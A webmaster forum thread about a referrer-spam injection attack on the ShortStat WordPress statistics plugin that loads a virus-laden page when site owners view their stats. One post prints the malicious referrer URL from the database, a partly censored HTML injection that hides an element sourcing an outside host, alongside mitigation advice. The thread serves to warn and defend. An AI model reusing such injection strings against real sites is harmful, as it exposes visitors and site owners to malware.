VERY IMPORTANT!! Read in if you use shortstats

[rogue]

Yet again some russian scum bag is trying to fuck your computer over, he is getting his website to appear in your stats and somehow if you check your stats using shortstats it will automatically launch his site filled to the brim with viruses.
guess who his major sponsor is? AFF! Suprised?

[rogue]

its been reported by others now, so bumpy bump bump

[JaceXXX]

any ideas how he is getting in?

[JaceXXX]

I just disabled and deleted it, and made a post on my blog about it, maybe we will see someone helping soon, i know a LOT of people use that plugin and it is a pretty standard part of my blog installs
If you run ShortStat, disable it NOW | JustJace.com

[rogue]

Quote:

Originally Posted by JaceXXX

any ideas how he is getting in?

i believe that he is sending fake hits so that his site apears on the referral list and using an exploit to open his site up when shortstats is read. trouble is, the dammed virus page appears before i can get a chance to check the stats page properly. i'm just disabling my shortstats untill "hopefully" a nvew version comes out

[JaceXXX]

ok, i figured it out

i went into my database and he is sending a fake referrer with this as the url

Code:

http://a"></a>what>we<****** src=http://peewee.6x.to style=display:none></******><won.com

Just open up phpmyadmin and do a search for "******" in the wp_ss_stats table

and I would suggest coding something into the wp-shortstat.php to not allow the term "******" to be used in referrers. I have my programmer working on it now, will post when he is done

[kaktusan]

nowadays most shit is oriented to affecting webmasters and especially wordpress and its plugins since it is heavily used and open sourced. you guys should be careful when installing such free plugins from unverified sources!

[JaceXXX]

Quote:

Originally Posted by kaktusan

nowadays most shit is oriented to affecting webmasters and especially wordpress and its plugins since it is heavily used and open sourced. you guys should be careful when installing such free plugins from unverified sources!

well, I won't install a plugin unless it is on the wordpress site, PERIOD

and this has been on the wordpress.org site for a while

if you can't find it on WordPress › WordPress Plugins then it shouldn't be installed

[kaktusan]

Quote:

Originally Posted by JaceXXX

well, I won't install a plugin unless it is on the wordpress site, PERIOD

and this has been on the wordpress.org site for a while

if you can't find it on WordPress › WordPress Plugins then it shouldn't be installed

so it was approved one? damn...

[JaceXXX]

Quote:

Originally Posted by kaktusan

so it was approved one? damn...

yeah, but here is the thing, the way this guy did this is pretty tricky, and in all honesty I would have NEVER thought of something like that, so I do give him points for being creative, but I also take a point off to the programmer for not thinking of it, ahha

a simple strip code command could have stopped this before it even started

i have a feeling there are going to be a couple thousand angry webmaster in the next few days

[kaktusan]

oh, just for the record, i just was looking at my Blogs Organizer stats and i see url code you pasted from your database Jace. Glad nothing happens in my script. I now remembered i have seen that before about a week appearing from time to time in my stats. I knew someone is trying to spam with HTTP Referrals and didn't pay attention, coz its regularly nowadays..

Looks like he is getting the blog urls from some big blog directories, coz i have nothing WP related at my blogs..